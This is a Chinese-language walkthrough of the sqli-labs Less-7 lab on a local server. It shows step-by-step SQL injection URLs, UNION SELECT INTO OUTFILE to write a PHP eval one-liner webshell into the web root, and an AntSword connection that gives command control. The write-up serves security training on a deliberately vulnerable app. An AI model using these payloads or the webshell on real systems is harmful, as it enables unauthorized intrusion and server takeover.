摘要 {#摘要}
本篇文章主要介绍了如何使用webshell上传一句话木马到sqli-labs的Less-7题目中,以此来实现对目标网站的控制。其中,通过HackBar插件判断注入点,通过order by语句判断字段数,通过union select语句注入一句话木马,最终使用蚁剑连接实现对目标网站的控制。
前言 {#前言}
这章主要考点就是webshell上传,由于我们docker部署的mysql无法上传,我们这章启用我们windows部署的sqli-labs,注意不是我屈服了,而是我不想半途而废,给大家一个完整的学习之路
准备 {#准备}
开启phpstudy,开启apache服务以及mysql服务
实验环节 {#实验环节}
浏览器访问Less-7
http://127.0.0.1/sqli-labs-master/Less-7/
打开HackBar插件
判断是否存在注入 {#判断是否存在注入}
http://127.0.0.1/sqli-labs-master/Less-7/?id=1'
#id=1',初步判断字符串注入
分析是否存在括号及其个数 {#分析是否存在括号及其个数}
http://127.0.0.1/sqli-labs-master/Less-7/?id=1') and 1=1 -- xz #一个括号页面还是显示报错
http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) and 1=1 -- xz #两个括号页面显示正常,由此可推断出,这是带双括号的单引号注入
看到outfile分析存在文件上传注入
判断字段数 {#判断字段数}
http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) order by 4 -- xz
实验环节 {#实验环节}
1、先判断题目的绝对路径,由于本题没有回显报错,所以无法获得路径,但是之前的1-6题都有回显报错,可以从这块入手,我这里用的是Less-1
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,@@datadir -- xz
#由此可以看出网站的绝对路径是D:\phpstudy_pro\WWW,通过了解sqli-labs的结构可以得出完整路径为D:\phpstudy_pro\WWW\sqli-labs-master\Less-7
2、查看读写权限
http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) and (select count(*) from mysql.user)>0 -- xz
#返回正常,说明具有文件读写权限
导入一句话木马
http://127.0.0.1/sqli-labs-master/Less-7/?id=-1'))union select 1,"<?php eval($_REQUEST[cz])?>",3 into outfile "D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\shell.php" -- xz
#可以看出shell.php文件已经成功上传
蚁剑连接
http://192.168.1.40/sqli-labs-master/Less-7/shell.php
#这里的ip地址是我本机的ip地址,因为蚁剑在虚拟机,所以连接要带ip地址
成功登录,我们可以在文件目录下操作,也可以在控制台上进行任何操作